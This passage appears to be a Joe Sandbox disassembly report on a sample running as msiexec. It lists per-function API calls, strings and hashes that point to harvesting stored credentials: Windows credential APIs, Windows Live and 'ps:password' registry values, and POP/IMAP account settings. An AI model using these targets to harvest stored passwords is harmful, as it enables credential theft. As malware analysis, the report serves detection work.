                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                    • API String ID: 1640410171-2022683286
                                                                    • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                    • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                    • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                    • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                    Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                    • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                    • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$strlen
                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                    • API String ID: 2619041689-3408036318
                                                                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                    Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$strlen
                                                                    • String ID:
                                                                    • API String ID: 667451143-3916222277
                                                                    • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                    • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                    • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                    • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                    Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                    • wcslen.MSVCRT ref: 0040874A
                                                                    • wcsncmp.MSVCRT ref: 00408794
                                                                    • memset.MSVCRT ref: 0040882A
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                    • wcschr.MSVCRT ref: 0040889F
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                    • String ID: J$Microsoft_WinInet
                                                                    • API String ID: 3318079752-260894208
                                                                    • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                    • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                    Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004037EB
                                                                    • memset.MSVCRT ref: 004037FF
                                                                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                    • strchr.MSVCRT ref: 0040386E
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                    • strlen.MSVCRT ref: 00403897
                                                                    • sprintf.MSVCRT ref: 004038B7
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                    • String ID: %s@yahoo.com
                                                                    • API String ID: 2240714685-3288273942
                                                                    • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                    • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                    Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                    • API String ID: 2780580303-317687271
                                                                    • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                    • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                    • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                    • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                    Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                    • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                    • API String ID: 888011440-2039793938
                                                                    • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                    • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                    Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • unable to open database: %s, xrefs: 0042EBD6
                                                                    • out of memory, xrefs: 0042EBEF
                                                                    • database %s is already in use, xrefs: 0042E9CE
                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                    • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                    • database is already attached, xrefs: 0042EA97
                                                                    • too many attached databases - max %d, xrefs: 0042E951
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                    • API String ID: 1297977491-2001300268
                                                                    • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                    • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                    • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                    • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                    Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                    • strchr.MSVCRT ref: 0040327B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringstrchr
                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                    • API String ID: 1348940319-1729847305
                                                                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                    Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                    • API String ID: 3510742995-3273207271
                                                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                    Function 0040F460 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F567
                                                                    • memset.MSVCRT ref: 0040F57F
                                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                    • String ID:
                                                                    • API String ID: 78143705-3916222277
                                                                    • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                    • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                    Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                    • memset.MSVCRT ref: 0040FA1E
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                    • _strnicmp.MSVCRT ref: 0040FA4F
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                    • API String ID: 945165440-3589380929
                                                                    • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                    • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                    • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                    • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                    Function 0040F802 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 118registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F84A
                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                    • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                    • String ID: Creds$ps:password
                                                                    • API String ID: 2290531041-1872227768
                                                                    • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                    • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                    Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                      • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                      • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                    • strchr.MSVCRT ref: 0040371F
                                                                    • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                    • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                    • strlen.MSVCRT ref: 00403778
                                                                    • sprintf.MSVCRT ref: 0040379C
                                                                    • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                    • String ID: %s@gmail.com
                                                                    • API String ID: 3261640601-4097000612
                                                                    • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                    • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                    Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004094C8
                                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                    • memset.MSVCRT ref: 0040950C
                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                    • _strcmpi.MSVCRT ref: 00409531
                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                    • String ID: sysdatetimepick32
                                                                    • API String ID: 3411445237-4169760276
                                                                    • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                    • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                    Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403504
                                                                    • memset.MSVCRT ref: 0040351A
                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscatmemset$_mbscpystrlen
                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                    • API String ID: 632640181-966475738
                                                                    • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                    • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                    Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                    • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                    • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                      • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                      • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                      • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                    • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Item$DialogMessageSend
                                                                    • String ID:
                                                                    • API String ID: 2485852401-0
                                                                    • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                    • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                    • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                    • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                    Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                    • String ID:
                                                                    • API String ID: 3642520215-0
                                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                    Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
